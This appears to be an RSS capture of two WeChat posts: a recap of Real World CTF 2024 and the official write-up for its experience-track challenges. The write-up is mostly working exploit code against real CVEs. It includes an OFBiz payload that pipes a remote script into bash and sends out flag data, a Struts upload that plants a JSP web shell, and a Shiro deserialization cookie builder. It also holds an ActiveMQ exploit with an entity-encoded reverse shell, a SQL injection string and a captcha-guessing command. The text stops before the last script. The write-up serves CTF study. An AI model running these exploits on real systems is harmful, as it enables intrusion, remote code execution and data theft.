胖哈勃 https://wechat2rss.xlab.app/feed/280cc6aaef116a9701025a97aa73f7ee731bac36.xml 1990年,哈勃望远镜(Hubble Space Telescope)发射升空,开启了人类对宇宙空间的崭新探索。 现在,Pwnhub的出现,将引领那些对网络安全感兴趣的人们探索“0 1”世界中的无限奥秘。 (wechat feed made by @ttttmr https://wechat2rss.xlab.app) (胖哈勃) https://wx.qlogo.cn/mmhead/Q3auHgzwzM6ibRpsUWHiaEBDbqkU66w9sVDAjvCIb531p2AI3gIKv4vg/0 胖哈勃 https://wechat2rss.xlab.app/feed/280cc6aaef116a9701025a97aa73f7ee731bac36.xml 精彩回顾|Real World CTF 2024,我说你别太i了! https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247501518&idx=1&sn=01cefd9f970cc78b80a55da9504f2e81 还不是因为热爱 长亭科技 2024-02-04 18:18 河南

还不是因为热爱



伴随着某选手的灵魂发问

1月26日19:00 (GMT+8)

第六届Real World CTF正式开赛


令数千名CTFer 抓狂期待的技术party开始了

据说 本次出题组&直播组i人云集

一起一探究竟吧




2200余支顶尖国际战队

48小时激烈角逐

千余次签到题解出

1352次有效flag提交

16次一血

积分榜首得主数次反转


比赛过程中,前10战队比分分外胶着,一道题目的积分差距即有可能造成战局大反转,战况分外激烈。



最终,Kalmarunionen战队历经48小时奋战角逐勇登榜首,凭借T-Box题目唯一解脱颖而出,从上一届的第26名直冲本届积分榜首,终以2293的总积分优势力夺RWCTF 2024国际赛冠军;由PPP,The Duck,Maple Bacon三支老牌战队联合组成的MMM战队首战告捷,以小比分差距荣登亚军;Friendly Maltese Citizens战队紧随其后,荣获季军。



隔壁体验赛同样上演了一场惊心动魄的24h技术交锋。来自企业、高校和长亭合作伙伴的328支战队参赛竞技、各显神通,将15道题目全部攻破。



最后,U8f2_team战队、天枢Dubhe战队和枇杷135元一箱战队,分别荣获企业赛道、高校赛道和伙伴赛道第一名桂冠。


更令人惊喜的是,来自北京邮电大学的天枢Dubhe战队和来自南京邮电大学的X1cT34m战队均仅差一题便完成了AK(破解全部题目),尽显后浪实力。





历届RWCTF总有那么几道题目有本事让人怀疑人生,今年当然也不例外。国际赛总共21道题目,直到比赛结束仍有5道题目呈现0解状态,未有人窥得门径,4道题目仅有1解。


由于每届题目都被吐槽太难,今年,主办方特地征集了2个大家讨论热度非常高的题目,比赛一结束,立马邀请出题人现场给答案——i人为了让选手满意也是使出了浑身解数。



都说高手之间的碰撞是一个相互成就的过程,连续6年的较量间,不仅选手从题目中汲取了经验思路,出题组也从选手处收获颇丰。以今年备受热议的ChatterBox题目为例。这道题目主要考验选手的代码审计、沙箱逃逸等技巧,出题人给出的思路是从获取管理员密码入手搞定题目(详见视频解析)。


然而,选手们却给出了多种奇妙解题姿势:

01
选手解题姿势一

通过深入分析 getResource 的代码直接请求一个IP,促使题目直接向目标服务器发起 FTP 连接,甚至可以不用文件上传。

02
选手解题姿势二

发现服务器上传文件会保存临时文件在 /proc/self/fd/ 中,巧妙地通过 ? 或者 # 对后缀限制进行绕过,从而达到文件包含。

03
选手解题姿势三

发现直接修改 postgresql 的配置文件然后通过重新加载配置文件进行 RCE,甚至无需用到出题方提供的渲染接口便解开了题目。






“ChatterBox 这道题确实有很多解法和预期解法不太一样,甚至有一些是我没有想到的方法,但是我觉得也挺好的!很高兴看到参赛选手能在题目中获得一些收获,哪怕很小的收获。说不定在我们以后的工作中,就能够用上呢!”

——ChatterBox出题人






尊嘟假嘟,有小道消息称,本届RWCTF出题组被一大批i人占领了,就连围炉夜话也汇集了一批CTF届的大神级i人。康康今年围炉夜话的嘉宾都有谁:RWCTF创办人杨坤、最强大脑脑王郑林楷、Nu1L战队创始人付浩、Redbud战队Eki以及RWCTF出题组救火队长Explorer——当真大咖云集。



从i人的视角看,独自打一场CTF、享受挑战、追求突破,是一种热爱、是一种技术磨砺和经验加成。


对于Nu1L战队创始人付浩而言,打CTF的经历,为他目前的团队管理工作带来了借鉴性的启发。“确定大家能力都ok的情况下,尽量和大家做朋友”,他分享道。


最强大脑“脑王”郑林楷则在直播中坦言,对他来说,较之最强大脑的挑战,打CTF还会更难一些。因为CTF需要大量的经验和知识储备,而这些东西需要长时间的积累,也很看天赋。他很享受打CTF的感觉,那种突破挑战的快乐是令人非常享受的过程。


当然,这其中也有令人emo的部分,比如misc题目。这类题目不仅考验技术实力,还需要足够的发散性思维、需要抓住出题人的脑洞。对于出题组救火队长Explorer来说,他实在与这类题目无缘,怎么也对不上出题人的脑洞。也不知是不是由于这个原因,今年的RWCTF题目均为NO GUESSING,无需强大脑洞,亦没有出现黑盒。


无论快乐还是emo,不变的是对CTF的那份热爱。直播中,RWCTF创办人杨坤博士将“黑客精神”描述为一种对世间条条框框、规则漏洞的质疑、修缮,一种对困难的挑战与突破。RWCTF在做的,就是要让全球的CTF爱好者拥有一个传递热爱、追求和分享技术经验&技巧&快乐的年度技术party,同时,也让自己回归到一种技术的纯真中。


对此,Eki引用段海新老师的话:“‘黑客精神’就是通过发现这个世界的不美好,让世界变得更美好。”



值得一提的是,本届直播在围炉夜话和赛题精讲的同时,还邀请了多位CTF老赛棍、出题人科普CTF冷知识、翻牌互动抽奖,奉上一波RWCTF的往届精彩爆料。



可乐上惊现“0day”可还行



翻库房翻出了当年RWCTF第二届线下赛签道题同款定制可乐(老古董满满的回忆),主办方给选手发放的可乐上居然印有flag,也是诚意满满了。


解题成功反成“翻座现场”?



故事发生在首届RWCTF现场,这位来自LC↯BC战队的选手来挑战一道名为KitKot的题目。此前他已经上台挑战2次未果了,但这一次的利用顺利成功了。兴奋之余一个后仰,成功坐翻小凳子。


大哥电脑自带天线?



RWCTF出题人曾编写一整套具有漏洞的智能门锁系统,并提供了433兆赫兹的通信硬件,而选手的目标是上台来通过无接触的方式通过漏洞修改门锁的密码(无线操作场景)。现场有一位大哥的电脑魔改的非常有趣,甚至自带天线,他直接用自己的设备挑战了这道题目。






历经本届姿势各异的题目挑战,选手们纷纷放出评分,在评分榜“保持队形”, 投出了清一色的100分反馈。这一波热i没有一直挂在嘴边,但行动见证了他们对RWCTF最真挚的认可。



当真,i了,爱了。




生命不息,热爱不止

以真实为名、以极客为名

让我们相约

下一届Real World CTF

再起征程

阅读原文

跳转微信打开

]]> Sun, 04 Feb 2024 18:18:00 +0800 【Real World CTF 6th Writeup】就是它!RWCTF 2024体验赛官方Writeup奉上! https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247501518&idx=2&sn=d153fbbdc8f19fba52f125201618e15a 这篇很长、但料很足,建议留个整时间,沉浸式食用😋 长亭科技 2024-02-04 18:18 河南

这篇很长、但料很足,建议留个整时间,沉浸式食用😋










Challenge






01
Be-a-Framework-Hacker



Clone-and-Pwn, difficulty:Baby


由于提供了附件,可以使用如下命令在本地启动一个服务

docker build . -t rwctf:be-a-framework-hackerdocker run --rm -p 8443:8443 rwctf:be-a-framework-hacker

这题主要考察的漏洞是CVE-2023-51467,通过?USERNAME=&PASSWORD=&requirePasswordChange=Y绕过鉴权。绕过鉴权之后可以执行 groovy 表达式, 这里使用的是 groovy 的 "".execute()语法来执行命令,绕过沙箱,具体 payload 如下

POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1Host: 127.0.0.1:8443Accept-Encoding: gzip, deflate, brAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36Connection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 81groovyProgram=["sh","-c","curl http://igr3yxom.requestrepo.com | bash"].execute()

curl http://requestrepo.com/igr3yxom/ --data $(/readflag)



02
Be-more-Elegant



Webdifficulty:Baby


这里考察的是 s2-066 ,提供了附件下载下来之后,可以进行代码审计

 be.more.elegant.filter.JspFilter#doFilter 中限制了 jsp 访问路径只能是  /view 开头的,其他路由的 jsp 是无法访问的。

be.more.elegant.HeaderIconAction#doUpload这个方法对应的路由是/upload.action

由于 s2 的限制,正常上传的文件名是无法包含 .. 的。所以我们通过 s2 066 这个漏洞,由于 s2 对于大小不敏感,所以我们可以使用如下 payload 去对 fileUploadFileName 进行二次赋值,让实际的  fileUploadFileName 内容为 ../../../views/a.jsp ,这样就可以通过跨目录写 jsp 到 views 目录下。

ps: 这里要注意在使用这个包之前需要上传一个正常的文件,保证 md5 的目录可以创建出来。因为 ../ 在 linux 系统下是无法跳到一个不存在的目录的。

POST /upload.action;jsessionid=D2DF7842CD2DEA1BE82A7300A134F655 HTTP/1.1User-Agent: PostmanRuntime/7.36.1Accept: */*Host: 192.168.144.1:8081Accept-Encoding: gzip, deflate, brConnection: closeContent-Type: multipart/form-data; boundary=--------------------------319187937788325310215959Content-Length: 1737----------------------------319187937788325310215959Content-Disposition: form-data; name="FileUpload"; filename="a.jsp"Content-Type: application/octet-stream<%@ page language="java" contentType="text/html; charset=UTF-8"    pageEncoding="UTF-8"%><%@ page import="java.io.*" %><!DOCTYPE html><html><head>    <title>Command Execution</title></head><body>    <%        String command = request.getParameter("a");        if (command != null && !command.isEmpty()) {            String output = "";            try {                Process process = Runtime.getRuntime().exec(command);                BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));                String line;                while ((line = reader.readLine()) != null) {                    output += line + "<br>";                }                reader.close();                int exitCode = process.waitFor();                if (exitCode != 0) {                    output += "Command execution failed with exit code: " + exitCode;                }            } catch (IOException | InterruptedException e) {                output += "Error executing command: " + e.getMessage();            }            out.println("<p>Executed command: " + command + "</p>");            out.println("<p>Output:</p>");            out.println("<pre>" + output + "</pre>");        } else {            out.println("<p>No command provided.</p>");        }    %></body></html>----------------------------319187937788325310215959Content-Disposition: form-data; name="fileUploadFileName"../../../views/a.jsp----------------------------319187937788325310215959--



03
Old-Shiro



Webdifficulty:Normal


使用以下 docker-compose 文件搭建

version: '3.3'services:  nginx:    image: nginx:1.20.1    ports:      - "0.0.0.0:8888:8888"    volumes:        - ./nginx.conf:/etc/nginx/nginx.conf    networks:      - internal_network      - out_network  backend:    build:      context: ./backend      dockerfile: Dockerfile    networks:      - internal_networknetworks:    internal_network:        internal: true        ipam:            driver: default    out_network:        ipam:            driver: default

其中 nginx 主要是将 java 的端口代理出来,里面的 backend 服务是一个 shiro550 的漏洞环境,配置为不出网。

首先分析 oldshiro 这个 jar 包,可以看到其设置了最大的 header 长度为 3000

由于目标配置的是不出网的场景,因此我们需要考虑使用不出网的手法来进行 RCE,且 cookie 不能太大。

如果使用网上的工具基本上 cookie 都会大于 3k

package org.example;import com.nqzero.permit.Permit;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;import javassist.ClassClassPath;import javassist.ClassPool;import javassist.CtClass;import org.apache.commons.beanutils.BeanComparator;import org.objectweb.asm.*;import javax.crypto.BadPaddingException;import javax.crypto.Cipher;import javax.crypto.IllegalBlockSizeException;import javax.crypto.NoSuchPaddingException;import javax.crypto.spec.IvParameterSpec;import javax.crypto.spec.SecretKeySpec;import java.io.*;import java.lang.reflect.AccessibleObject;import java.lang.reflect.Field;import java.math.BigInteger;import java.net.URLEncoder;import java.security.*;import java.util.Base64;import java.util.PriorityQueue;public class Main {    public static void main(String[ ] args) throws Exception {        String key = "kPH+bIxk5D2deZiIxcaaaA==";        String javaCode = "Object attr = java.lang.Class.forName(\"org.springframework.web.context.request.RequestContextHolder\").getMethod(\"currentRequestAttributes\", new java.lang.Class[ ]{}).invoke(null,null);" +                "Object resp = attr.getClass().getMethod(\"getResponse\", null).invoke(attr, null);" +                "String flag = new java.lang.String(java.nio.file.Files.readAllBytes(java.nio.file.Paths.get(\"/flag\", new java.lang.String[ ]{})));" +                "resp.getClass().getMethod(\"addHeader\", new java.lang.Class[ ]{java.lang.String.class, java.lang.String.class}).invoke(resp, new java.lang.Object[ ]{\"r\", flag});";        Object cbGadget = getCbGadget(javaCode);        byte[ ] cbGadgetBytes = Serialization.serialize(cbGadget);        String s = doShiroEncryption(cbGadgetBytes, key);        System.out.println("Cookie length: " + s.length());        System.out.println("Cookie is: " + s);    }    public static byte[ ] base64Decode(String key) {        return Base64.getDecoder().decode(key);    }    public static String base64Encode(byte[ ] key) {        return Base64.getEncoder().encodeToString(key);    }    public static String urlEncode(String key) throws UnsupportedEncodingException {        return URLEncoder.encode(key, "UTF-8");    }    public static String doShiroEncryption(byte[ ] content, String keyInBase64) throws NoSuchAlgorithmException, NoSuchPaddingException, InvalidAlgorithmParameterException, InvalidKeyException, IllegalBlockSizeException, BadPaddingException {        byte[ ] key = base64Decode(keyInBase64);        byte[ ] iv = generateRandomIv();        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");        Key keySpec = new SecretKeySpec(key, "AES");        IvParameterSpec ivSpec = new IvParameterSpec(iv);        cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec);        byte[ ] encrypted = cipher.doFinal(content);        byte[ ] cipherText = new byte[iv.length + encrypted.length];        System.arraycopy(iv, 0, cipherText, 0, iv.length);        System.arraycopy(encrypted, 0, cipherText, iv.length, encrypted.length);        return base64Encode(cipherText);    }    private static byte[ ] generateRandomIv() throws NoSuchAlgorithmException {        byte[ ] iv = new byte[16];        SecureRandom random = SecureRandom.getInstance("SHA1PRNG");        random.nextBytes(iv);        return iv;    }    public static Object getCbGadget(String javaCode) throws Exception {        final Object templates = Gadgets.createTemplatesImpl(javaCode);        // mock method name until armed        final BeanComparator comparator = new BeanComparator("lowestSetBit");        // create queue with numbers and basic comparator        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);        // stub data for replacement later        queue.add(new BigInteger("1"));        queue.add(new BigInteger("1"));        // switch method called by comparator        Reflections.setFieldValue(comparator, "property", "outputProperties");        // switch contents of queue        final Object[ ] queueArray = (Object[ ]) Reflections.getFieldValue(queue, "queue");        queueArray[0] = templates;        queueArray[1] = templates;        return queue;    }    public static class Serialization {        public static byte[ ] serialize(Object obj) throws IOException {            final ByteArrayOutputStream out = new ByteArrayOutputStream();            serialize(obj, out);            return out.toByteArray();        }        public static void serialize(Object obj, OutputStream out) throws IOException {            final ObjectOutputStream objOut = new ObjectOutputStream(out);            objOut.writeObject(obj);        }    }    public static class Gadgets {        public static Object createTemplatesImpl(final String command) throws Exception {            if (Boolean.parseBoolean(System.getProperty("properXalan", "false"))) {                return createTemplatesImpl(                        command,                        Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"),                        Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"),                        Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl"));            }            return createTemplatesImpl(command, TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class);        }        public static <T> T createTemplatesImpl(final String javaCode, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory)                throws Exception {            final T templates = tplClass.newInstance();            ClassPool pool = ClassPool.getDefault();            pool.insertClassPath(new ClassClassPath(abstTranslet));            final CtClass clazz = pool.makeClass("StubTransletPayload");            clazz.makeClassInitializer().insertAfter(javaCode);            clazz.setName("ysoserial.Pwner" + System.nanoTime());            CtClass superC = pool.get(abstTranslet.getName());            clazz.setSuperclass(superC);            byte[ ] classBytes = clazz.toBytecode();            // inject class bytes into instance            classBytes = shortenClassBytes(classBytes);            byte[ ] fooBytes = shortenClassBytes(ClassFiles.classAsBytes(Foo.class));            Reflections.setFieldValue(templates, "_bytecodes", new byte[ ][ ]{                    classBytes, ClassFiles.classAsBytes(Foo.class)            });            // required to make TemplatesImpl happy            Reflections.setFieldValue(templates, "_name", "1");            Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance());            return templates;        }    }    public static class ClassFiles {        public static String classAsFile(final Class<?> clazz) {            return classAsFile(clazz, true);        }        public static String classAsFile(final Class<?> clazz, boolean suffix) {            String str;            if (clazz.getEnclosingClass() == null) {                str = clazz.getName().replace(".", "/");            } else {                str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName();            }            if (suffix) {                str += ".class";            }            return str;        }        public static byte[ ] classAsBytes(final Class<?> clazz) {            try {                final byte[ ] buffer = new byte[1024];                final String file = classAsFile(clazz);                final InputStream in = ClassFiles.class.getClassLoader().getResourceAsStream(file);                if (in == null) {                    throw new IOException("couldn't find '" + file + "'");                }                final ByteArrayOutputStream out = new ByteArrayOutputStream();                int len;                while ((len = in.read(buffer)) != -1) {                    out.write(buffer, 0, len);                }                return out.toByteArray();            } catch (IOException e) {                throw new RuntimeException(e);            }        }    }    public static class Foo implements Serializable {        private static final long serialVersionUID = 8207363842866235160L;    }    public static class Reflections {        public static void setAccessible(AccessibleObject member) {            String versionStr = System.getProperty("java.version");            int javaVersion = Integer.parseInt(versionStr.split("\\.")[0]);            if (javaVersion < 12) {                // quiet runtime warnings from JDK9+                Permit.setAccessible(member);            } else {                // not possible to quiet runtime warnings anymore...                // see https://bugs.openjdk.java.net/browse/JDK-8210522                // to understand impact on Permit (i.e. it does not work                // anymore with Java >= 12)                member.setAccessible(true);            }        }        public static Field getField(final Class<?> clazz, final String fieldName) {            Field field = null;            try {                field = clazz.getDeclaredField(fieldName);                setAccessible(field);            }            catch (NoSuchFieldException ex) {                if (clazz.getSuperclass() != null)                    field = getField(clazz.getSuperclass(), fieldName);            }            return field;        }        public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {            final Field field = getField(obj.getClass(), fieldName);            field.set(obj, value);        }        public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {            final Field field = getField(obj.getClass(), fieldName);            return field.get(obj);        }    }    public static byte[ ] shortenClassBytes(byte[ ] classBytes) {        ClassReader cr = new ClassReader(classBytes);        ClassWriter cw = new ClassWriter(ClassWriter.COMPUTE_FRAMES);        int api = Opcodes.ASM7;        ClassVisitor cv = new ShortClassVisitor(api, cw);        int parsingOptions = ClassReader.SKIP_DEBUG | ClassReader.SKIP_FRAMES;        cr.accept(cv, parsingOptions);        byte[ ] out = cw.toByteArray();        return out;    }    public static class ShortClassVisitor extends ClassVisitor {        private final int api;        public ShortClassVisitor(int api, ClassVisitor classVisitor) {            super(api, classVisitor);            this.api = api;        }        @Override        public MethodVisitor visitMethod(int access, String name, String descriptor, String signature, String[ ] exceptions) {            MethodVisitor mv = super.visitMethod(access, name, descriptor, signature, exceptions);            return new ShortMethodAdapter(this.api, mv);        }    }    public static class ShortMethodAdapter extends MethodVisitor implements Opcodes {        public ShortMethodAdapter(int api, MethodVisitor methodVisitor) {            super(api, methodVisitor);        }        @Override        public void visitLineNumber(int line, Label start) {            // delete line number        }    }}

pom.xml 如下

<?xml version="1.0" encoding="UTF-8"?><project xmlns="http://maven.apache.org/POM/4.0.0"         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">    <modelVersion>4.0.0</modelVersion>    <groupId>org.example</groupId>    <artifactId>OldShiroSolution</artifactId>    <version>1.0-SNAPSHOT</version>    <properties>        <maven.compiler.source>8</maven.compiler.source>        <maven.compiler.target>8</maven.compiler.target>        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>    </properties>    <dependencies>        <dependency>            <groupId>org.javassist</groupId>            <artifactId>javassist</artifactId>            <version>3.29.2-GA</version>        </dependency>        <dependency>            <groupId>com.nqzero</groupId>            <artifactId>permit-reflect</artifactId>            <version>0.3</version>        </dependency>        <dependency>            <groupId>commons-collections</groupId>            <artifactId>commons-collections</artifactId>            <version>3.1</version>        </dependency>        <dependency>            <groupId>commons-beanutils</groupId>            <artifactId>commons-beanutils</artifactId>            <version>1.9.2</version>        </dependency>        <dependency>            <groupId>org.ow2.asm</groupId>            <artifactId>asm-tree</artifactId>            <version>7.3.1</version>        </dependency>    </dependencies></project>

发包如下

GET /doLogin HTTP/1.1Host: 121.40.80.33:8888Cookie: rememberMe_rwctf_2024=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-Insecure-Requests: 1




04
Be-an-ActiveMq-Hacker



Clone-and-Pwndifficulty:Baby


环境搭建

使用以下 docker-compose 文件搭建环境

version: '3.3'services:  activemq:    container_name: activemq    ports:      - '61616:61616'    image: lewinc/activemq:5.18.2

解题

使用 CVE-2023-46604 进行攻击即可,使用 org.springframework.context.support.ClassPathXmlApplicationContext

 java 脚本如下

package exps;import java.io.*;import java.net.Socket;public class ActiveMqThrowableExp {    public static void main(String[ ] args) throws IOException {        String ip = "target-ip-address";        int port = 61616;        String remoteXmlUrl = "http://your-http-server:9999/evil.xml";        Socket sck = new Socket(ip, port);        DataOutputStream out = null;        DataInputStream in = null;        out = new DataOutputStream(new BufferedOutputStream(new FileOutputStream("test.txt")));        out.writeInt(32);        out.writeByte(31);        out.writeInt(1);        out.writeBoolean(true);        out.writeInt(1);        out.writeBoolean(true);        out.writeBoolean(true);        out.writeUTF("org.springframework.context.support.ClassPathXmlApplicationContext");        out.writeBoolean(true);        out.writeUTF(remoteXmlUrl);        out.close();        in = new DataInputStream(new BufferedInputStream(new FileInputStream("test.txt")));        OutputStream os = sck.getOutputStream();        int length = in.available();        byte[ ] buf = new byte[length];        in.readFully(buf);        os.write(buf);        in.close();        sck.close();        File file = new File("test.txt");        file.delete();    }}

然后在恶意服务器上分别启动一个 nc 用来收反弹 shell,另一个启动 http 服务用来提供 xml,注意下面的 value 是 html entity 编码后的,可以解码后替换为接受 shell 的 ip 和端口即可收到反弹shell

提供的 xml 如下

注意需要修改实体编码中的localhost为你的接收端主机

<?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">    <constructor-arg>      <list>        <value>/bin/bash</value>        <value>-c</value>        <value>&#x2f;&#x62;&#x69;&#x6e;&#x2f;&#x62;&#x61;&#x73;&#x68;&#x20;&#x2d;&#x69;&#x20;&#x3e;&#x26;&#x20;&#x2f;&#x64;&#x65;&#x76;&#x2f;&#x74;&#x63;&#x70;&#x2f;&#x6c;&#x6f;&#x63;&#x61;&#x6c;&#x68;&#x6f;&#x73;&#x74;&#x2f;&#x39;&#x39;&#x39;&#x39;&#x20;&#x30;&#x3e;&#x26;&#x31;          </value>      </list>    </constructor-arg>  </bean></beans>

远程收到shell,获取flag



05
YourSqlTrick



Webdifficulty:Baby


使用 \N 的方法绕过内置过滤,读取 flag 表中的 flag_value 字段:

/tags.php?/alias/aaaaaaa%27||+1=\Nunion+select+1,flag_value,3,4,5,6,7,8,0,10,11+from+flag+where+1=%271



06
Be-a-Captcha-Guesser



Webdifficulty:Normal


这个题目在首页提供了部分的源码,可以看出来是 django 的 wagtail 框架。主要是一个允许重置密码的功能,这里可以通过验证码得到其路由是/captcha/image/566babcf709fa2482d8dec2b71fd930474c8b34c/对此比较敏感的同学可以想到这个是一个 django 的验证码依赖 django-simple-captcha

通过信息搜集可以知道管理员的邮箱是admin@rwctf.game,图片的 seed 为566babcf709fa2482d8dec2b71fd930474c8b34c ,图片的 size 为 78 x 31

这个题目可以看作是 JumpserverCVE-2023-42820Lite 版本

ps: 这里需要对下面的脚本里面的 CAPTCHA_IMAGE_SIZE 进行修改,将其改成图片的大小

命令如下

python .\run.py -t http://121.40.246.97:39968/ --name admin --email admin@rwctf.game --seed 566babcf709fa2482d8dec2b71fd930474c8b34c --cscookie 60D8JJuDvGCCauRifigL5ycFXR1NPPd3 --cstoken pWB0Zc9JkmV9KrLzEjDpG9KzUME1OkLYlM4YyLtcFSnBKLsHJrJ0BxM4HtvEtZOR

脚本:

